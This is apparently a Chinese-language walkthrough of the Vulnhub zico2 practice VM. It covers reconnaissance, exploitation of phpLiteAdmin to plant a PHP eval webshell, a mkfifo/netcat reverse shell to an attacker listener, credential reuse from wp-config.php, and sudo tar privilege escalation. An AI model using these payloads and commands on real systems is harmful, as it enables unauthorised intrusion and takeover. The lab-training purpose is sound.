本篇文章旨在為網絡安全滲透測試靶機教學。通過閱讀本文,讀者將能夠對滲透Vulnhub系列zico2靶機有一定的了解
一、信息收集階段
靶機下載地址:https://download.vulnhub.com/zico/zico2.ova
因為靶機為本地部署虛擬機網段,查看dhcp地址池設置。得到信息IP為:192.168.220.0/24
1、掃描網段,發現主機
nmap -sP 192.168.220.0/24
# 快速驗證網段存活主機
2、掃描主機詳細信息
nmap -sT -sV -sC 192.168.220.132
#-sT 會嘗試與目標主機的每個端口建立完整的 TCP 連接
#-sV 嘗試確定每個打開端口上運行的服務的版本
#-sC 使用默認的腳本掃描(Script Scanning)可以幫助發現更多的信息,如漏洞、配置錯誤等
3、掃描80端口web目錄
dirb http://192.168.220.132
4、瀏覽網站
http://192.168.220.132/dbadmin
http://192.168.220.132/dbadmin/test_db.php# 文件包含漏洞
http://192.168.220.132/view.php?page=tools.html
二、滲透階段
1、搜索phpliteadmin歷史漏洞
searchsploite phpliteadmin
2、下載exp文件
searchsploite -m 24044.txtcat 24044.txt
3、使用burp suite爆破
4、登陸sqlitephp數據庫管理工具
http://192.168.220.132/dbadmin/test_db.php
password:admin
5、創建“數據庫"
poc.php
/usr/databases/poc.php
6、創建一句話木馬
<?php @eval($_POST[cmd])?>
7、中國蟻劍連接一句話木馬
8、反彈shell到kali攻擊機
# kali建立監聽
nc -lvnp 4444# 蟻劍連接靶機
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.220.128 4444 >/tmp/f
三、提權階段
1、查找suid權限
find / -perm -4000 -print 2>/dev/null #查找SUID 權限的文件
2、查看系統版本內核
uname -a
lsb_release -a
3、查看系統文件
/home/zico/wordpress/wp-config.php
username:zico
passwd:sWfCsfJSPV9H3AmQzw8
4、切換zico用戶
su zico
sWfCsfJSPV9H3AmQzw8
5、查看sudo -l
sudo -l
6、再次查找suid權限
find / -perm -4000 -print 2>/dev/null
7、tar提權
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
![](https://files.mdnice.com/user/82436/35dc83